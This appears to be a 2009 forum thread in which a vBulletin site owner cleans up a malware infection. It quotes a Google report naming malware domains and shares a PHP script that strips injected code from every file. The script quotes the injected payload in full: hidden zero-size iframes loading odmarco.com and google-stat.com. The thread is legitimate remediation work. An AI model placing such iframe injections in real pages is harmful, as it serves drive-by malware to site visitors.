Go Back   vb.org Archive > vBulletin 3 Discussion > vB3 General Discussions
FAQ Community Calendar Today's Posts Search

Reply
 
Thread Tools Display Modes
  #11  
Old 08-23-2009, 04:12 PM
rockinaway rockinaway is offline
 
Join Date: Jun 2005
Posts: 211
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Okay, doing that. How can I detect any malware or suspicious code? Any program?
Reply With Quote
  #12  
Old 08-23-2009, 04:18 PM
toonysnn toonysnn is offline
 
Join Date: Sep 2006
Location: Texas
Posts: 511
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Personally I just do it manually. Sometimes things are better off done by hand than by program.
Reply With Quote
  #13  
Old 08-23-2009, 04:20 PM
rockinaway rockinaway is offline
 
Join Date: Jun 2005
Posts: 211
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Okay, thanks for help so far. I am updating now, and have emailed host. I have also submitted site for reviewing by Google.

Right, a look at the Google report.

Quote:
Malicious software includes 1 trojan(s). Successful infection resulted in an average of 6 new process(es) on the target machine.

Malicious software is hosted on 8 domain(s), including odmarco.com/, 92.38.0.0/, go00ogle.net/.

3 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including odmarco.com/, s100.ucoz.ru/, goldtraff.info/.
The odmarco has been removed, not sure about the others.

--------------- Added [DATE]1251049948[/DATE] at [TIME]1251049948[/TIME] ---------------

Forum is updated, now looking into other problems.

When the page loads, an odmarco link still loads, not sure where to search for it.

--------------- Added [DATE]1251050426[/DATE] at [TIME]1251050426[/TIME] ---------------

Update: turns out many dreamhost people have had a problem. The script injects a line of code to nearly every index.php/html file accessible. There are some scripts to remove this, so I am working on it.

--------------- Added [DATE]1251052649[/DATE] at [TIME]1251052649[/TIME] ---------------

Okay, I need to edit this code so that it searches in EVERY html file and every folder and file to remove the line:

Code:
<?php

$clear = new clearOdmarco(getcwd());
$clear->main();
class clearOdmarco
{
  protected $path;
  protected $string_to_clear = '<iframe src="http://google-stat.com/tomi/?t=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://odmarco.com/tomi/?t=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://odmarco.com/arwe/?736361acd09ca9717c9462514beb5205" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>';
    public function __construct($path)
  {    $this->path = $path;
  }  
  public function main()
  {
    $this->checkDir($this->path);
  }
  
  protected function checkDir($path)
  {
    $dir = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($path));
    echo "PARSING " . $dir->getFileName() . "\n";
    
    foreach ( $dir as $current )
    {
      if ($current->isFile())
      {
        $this->clearFile($current->getPath() . '/' . $current->getFileName());
      }
    }
  }
  
  protected function clearFile($file)
  {
    echo 'checking ' . $file . "\n";
    $contents = file_get_contents($file);
    if (strpos($contents, 'odmarco'))
    {
      echo "FOUND string, cleaning\n";
      $clean_contents = $this->clean($contents);
      if (file_put_contents($file, $clean_contents))
      {
        echo "WRITTEN clean file contents\n";
      } else
      {
        echo "COULD NOT WRITE " . $file . "\n";
      }
    }
  }
  
  protected function clean($string)
  {
    $clean_contents = str_replace($this->string_to_clear, '', $string);
    return $clean_contents;
  }
}
--------------- Added [DATE]1251053592[/DATE] at [TIME]1251053592[/TIME] ---------------

Think I have got rid of it, please tell me if otherwise.
Reply With Quote
Reply


Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT. The time now is 01:13 PM.


Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2024, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.04879 seconds
  • Memory Usage 2,183KB
  • Queries Executed 11 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)ad_showthread_beforeqr
  • (1)ad_showthread_firstpost
  • (1)ad_showthread_firstpost_sig
  • (1)ad_showthread_firstpost_start
  • (1)bbcode_code
  • (1)bbcode_quote
  • (1)footer
  • (1)forumjump
  • (1)forumrules
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (1)navbar
  • (3)navbar_link
  • (120)option
  • (1)pagenav
  • (1)pagenav_curpage
  • (1)pagenav_pagelink
  • (3)post_thanks_box
  • (3)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (3)post_thanks_postbit_info
  • (3)postbit
  • (3)postbit_onlinestatus
  • (3)postbit_wrapper
  • (1)spacer_close
  • (1)spacer_open
  • (1)tagbit_wrapper 

Phrase Groups Available:
  • global
  • inlinemod
  • postbit
  • posting
  • reputationlevel
  • showthread
Included Files:
  • ./showthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_post_thanks.php 

Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showthread_start
  • showthread_getinfo
  • forumjump
  • showthread_post_start
  • showthread_query_postids
  • showthread_query
  • bbcode_fetch_tags
  • bbcode_create
  • showthread_postbit_create
  • postbit_factory
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • fetch_musername
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • pagenav_page
  • pagenav_complete
  • tag_fetchbit_complete
  • forumrules
  • navbits
  • navbits_complete
  • showthread_complete